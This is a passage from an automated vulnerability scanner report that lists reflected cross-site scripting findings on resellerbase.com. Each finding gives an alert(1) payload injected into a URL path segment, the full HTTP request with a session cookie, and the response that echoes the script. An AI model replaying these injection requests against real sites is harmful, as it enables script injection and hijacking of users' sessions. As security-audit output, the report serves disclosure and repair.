<title>Browse by Tag: themes7d299</title><img src=a onerror=alert(1)>899e9577b6/kosmos/images/rating/4.gif</title>
...[SNIP]...

2.4488. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 83be7</title><img%20src%3da%20onerror%3dalert(1)>1374ac8fa7b was submitted in the REST URL parameter 3. This input was echoed as 83be7</title><img src=a onerror=alert(1)>1374ac8fa7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos83be7</title><img%20src%3da%20onerror%3dalert(1)>1374ac8fa7b/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos83be7</title><img src=a onerror=alert(1)>1374ac8fa7b/images/rating/4.gif</title>
...[SNIP]...

2.4489. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b0372<img%20src%3da%20onerror%3dalert(1)>641357ec4d9 was submitted in the REST URL parameter 3. This input was echoed as b0372<img src=a onerror=alert(1)>641357ec4d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmosb0372<img%20src%3da%20onerror%3dalert(1)>641357ec4d9/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmosb0372<img src=a onerror=alert(1)>641357ec4d9/images/rating/4.gif]</td>
...[SNIP]...

2.4490. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7c3ec<img%20src%3da%20onerror%3dalert(1)>6248f289262 was submitted in the REST URL parameter 4. This input was echoed as 7c3ec<img src=a onerror=alert(1)>6248f289262 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images7c3ec<img%20src%3da%20onerror%3dalert(1)>6248f289262/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images7c3ec<img src=a onerror=alert(1)>6248f289262/rating/4.gif]</td>
...[SNIP]...

2.4491. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload 3556d</title><img%20src%3da%20onerror%3dalert(1)>572215c9ac9 was submitted in the REST URL parameter 4. This input was echoed as 3556d</title><img src=a onerror=alert(1)>572215c9ac9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images3556d</title><img%20src%3da%20onerror%3dalert(1)>572215c9ac9/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images3556d</title><img src=a onerror=alert(1)>572215c9ac9/rating/4.gif</title>
...[SNIP]...

2.4492. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e6a6a<img%20src%3da%20onerror%3dalert(1)>2bb4e733c7f was submitted in the REST URL parameter 5. This input was echoed as e6a6a<img src=a onerror=alert(1)>2bb4e733c7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/ratinge6a6a<img%20src%3da%20onerror%3dalert(1)>2bb4e733c7f/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/ratinge6a6a<img src=a onerror=alert(1)>2bb4e733c7f/4.gif]</td>
...[SNIP]...

2.4493. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload 8feac</title><img%20src%3da%20onerror%3dalert(1)>987b3f76a34 was submitted in the REST URL parameter 5. This input was echoed as 8feac</title><img src=a onerror=alert(1)>987b3f76a34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating8feac</title><img%20src%3da%20onerror%3dalert(1)>987b3f76a34/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating8feac</title><img src=a onerror=alert(1)>987b3f76a34/4.gif</title>
...[SNIP]...

2.4494. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a2937<img%20src%3da%20onerror%3dalert(1)>2cc7a9dbce3 was submitted in the REST URL parameter 6. This input was echoed as a2937<img src=a onerror=alert(1)>2cc7a9dbce3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/4.gifa2937<img%20src%3da%20onerror%3dalert(1)>2cc7a9dbce3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating/4.gifa2937<img src=a onerror=alert(1)>2cc7a9dbce3]</td>
...[SNIP]...

2.4495. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload 7e520</title><img%20src%3da%20onerror%3dalert(1)>6d806ee9133 was submitted in the REST URL parameter 6. This input was echoed as 7e520</title><img src=a onerror=alert(1)>6d806ee9133 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/4.gif7e520</title><img%20src%3da%20onerror%3dalert(1)>6d806ee9133 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating/4.gif7e520</title><img src=a onerror=alert(1)>6d806ee9133</title>
...[SNIP]...

2.4496. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47ba5<script>alert(1)</script>17f838d39c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag47ba5<script>alert(1)</script>17f838d39c2/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag47ba5<script>alert(1)</script>17f838d39c2/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.4497. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c964b<img%20src%3da%20onerror%3dalert(1)>882b893af26 was submitted in the REST URL parameter 2. This input was echoed as c964b<img src=a onerror=alert(1)>882b893af26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themesc964b<img%20src%3da%20onerror%3dalert(1)>882b893af26/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themesc964b<img src=a onerror=alert(1)>882b893af26/kosmos/images/rating/4half.gif]</td>
...[SNIP]...

2.4498. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 62659</title><img%20src%3da%20onerror%3dalert(1)>f203952bef3 was submitted in the REST URL parameter 2. This input was echoed as 62659</title><img src=a onerror=alert(1)>f203952bef3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes62659</title><img%20src%3da%20onerror%3dalert(1)>f203952bef3/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes62659</title><img src=a onerror=alert(1)>f203952bef3/kosmos/images/rating/4half.gif</title>
...[SNIP]...

2.4499. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2f914<img%20src%3da%20onerror%3dalert(1)>0d87b0d5e3e was submitted in the REST URL parameter 3. This input was echoed as 2f914<img src=a onerror=alert(1)>0d87b0d5e3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos2f914<img%20src%3da%20onerror%3dalert(1)>0d87b0d5e3e/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos2f914<img src=a onerror=alert(1)>0d87b0d5e3e/images/rating/4half.gif]</td>
...[SNIP]...

2.4500. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 6be5f</title><img%20src%3da%20onerror%3dalert(1)>512bde24650 was submitted in the REST URL parameter 3. This input was echoed as 6be5f</title><img src=a onerror=alert(1)>512bde24650 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos6be5f</title><img%20src%3da%20onerror%3dalert(1)>512bde24650/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos6be5f</title><img src=a onerror=alert(1)>512bde24650/images/rating/4half.gif</title>
...[SNIP]...

2.4501. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload 134d6</title><img%20src%3da%20onerror%3dalert(1)>49a3bd0520c was submitted in the REST URL parameter 4. This input was echoed as 134d6</title><img src=a onerror=alert(1)>49a3bd0520c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images134d6</title><img%20src%3da%20onerror%3dalert(1)>49a3bd0520c/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images134d6</title><img src=a onerror=alert(1)>49a3bd0520c/rating/4half.gif</title>
...[SNIP]...

2.4502. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d51ca<img%20src%3da%20onerror%3dalert(1)>9be68ca25b1 was submitted in the REST URL parameter 4. This input was echoed as d51ca<img src=a onerror=alert(1)>9be68ca25b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/imagesd51ca<img%20src%3da%20onerror%3dalert(1)>9be68ca25b1/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/imagesd51ca<img src=a onerror=alert(1)>9be68ca25b1/rating/4half.gif]</td>
...[SNIP]...

2.4503. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 88495<img%20src%3da%20onerror%3dalert(1)>23d5603ec6d was submitted in the REST URL parameter 5. This input was echoed as 88495<img src=a onerror=alert(1)>23d5603ec6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating88495<img%20src%3da%20onerror%3dalert(1)>23d5603ec6d/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating88495<img src=a onerror=alert(1)>23d5603ec6d/4half.gif]</td>
...[SNIP]...

2.4504. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload aa1f4</title><img%20src%3da%20onerror%3dalert(1)>3042811ec34 was submitted in the REST URL parameter 5. This input was echoed as aa1f4</title><img src=a onerror=alert(1)>3042811ec34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/ratingaa1f4</title><img%20src%3da%20onerror%3dalert(1)>3042811ec34/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/ratingaa1f4</title><img src=a onerror=alert(1)>3042811ec34/4half.gif</title>
...[SNIP]...

2.4505. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4f42d<img%20src%3da%20onerror%3dalert(1)>de1d55e530e was submitted in the REST URL parameter 6. This input was echoed as 4f42d<img src=a onerror=alert(1)>de1d55e530e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/4half.gif4f42d<img%20src%3da%20onerror%3dalert(1)>de1d55e530e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
